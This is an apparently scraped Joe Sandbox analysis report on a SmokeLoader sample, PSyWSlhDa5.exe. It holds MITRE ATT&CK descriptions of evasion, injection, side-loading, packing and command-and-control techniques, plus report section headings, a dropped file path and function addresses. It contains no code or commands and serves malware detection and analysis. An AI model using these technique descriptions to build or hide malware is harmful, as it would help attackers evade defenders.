Instruction ID: b1325b0026eafa7ad0e7e2534be0d060c3a089cb02c98be39e99c898c062b284
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 44113F79A00208EFDB01DF98C985E99BFF5AF08351F058094FA489B362D375EA50DF84

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PSyWSlhDa5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\jhfrihr

C:\Users\user\AppData\Roaming\jhfrihr:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
PSyWSlhDa5.exe

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Function 00403054 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 00601BA4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0062003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 00401919 Relevance: 1.3, APIs: 1, Instructions: 79
sleepCOMMON

Function 00401959 Relevance: 1.3, APIs: 1, Instructions: 66
sleepCOMMON

Function 00401970 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Function 00401977 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Function 00401987 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 0040198A Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Function 00601863 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Function 0040158E Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON